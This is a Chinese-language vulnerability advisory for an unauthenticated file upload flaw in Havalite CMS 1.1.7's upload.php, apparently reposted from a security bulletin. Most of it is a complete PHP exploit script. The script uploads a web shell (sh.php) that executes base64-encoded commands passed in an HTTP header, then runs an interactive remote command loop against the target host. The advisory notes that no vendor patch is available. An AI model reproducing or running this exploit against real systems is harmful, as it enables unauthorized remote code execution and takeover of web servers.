Havalite CMS upload.php 文件上传任意代码执行漏洞

发布日期:2013-06-17
更新日期:2013-07-13

受影响系统:
Havalite Havalite CMS 1.1.7
描述:
--------------------------------------------------------------------------------
Havalite 是一个开源轻量级CMS博客程序,基于PHP和SQLite开发。

Havalite CMS的upload.php脚本没有正确验证或过滤用户上传的文件,如果攻击者在用户可访问的路径放置了文件,直接请求该文件可使用户以Web服务器权限执行脚本。

<*来源:CWH Underground ()
 
  链接:
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
 
/*
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||  `--------'    |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|    /
    / XXXXXX /  `\  /
    / XXXXXX /\______(
  / XXXXXX /       
  / XXXXXX /
(________(         
  `------'
 
Exploit Title  : Havalite CMS Unrestricted File Upload Exploit
Date            : 16 June 2013
Exploit Author  : CWH Underground
Site            :
Vendor Homepage :
Software Link  :
Version        : 1.1.7
Tested on      : Window and Linux
 
 
#####################################################
VULNERABILITY: Unrestricted File Upload
#####################################################
 
/havalite/upload.php
 
#####################################################
DESCRIPTION
#####################################################
 
Restricted access to this script isn't properly realized (Don't require authentication) , 
so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file
extension isn't properly checked.
 

#####################################################
EXPLOIT
#####################################################
 
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
 
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
 
print "\n+-----------------------------------------------+";
print "\n| Havalite CMS Unrestricted File Upload Exploit |";
print "\n+-----------------------------------------------+\n";
 
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /havalite/\n";
    die();
}
 
$host = $argv[1];
$path = $argv[2];
 

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"files[]\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  = "POST {$path}havalite/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referee: {$host}{$path}havalite/hava_upload.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
     
http_send($host, $packet);
 
$packet  = "GET {$path}/havalite/tmp/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
     
while(1)
{
    print "\nHavalite-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
 
?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Havalite
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxgwp.html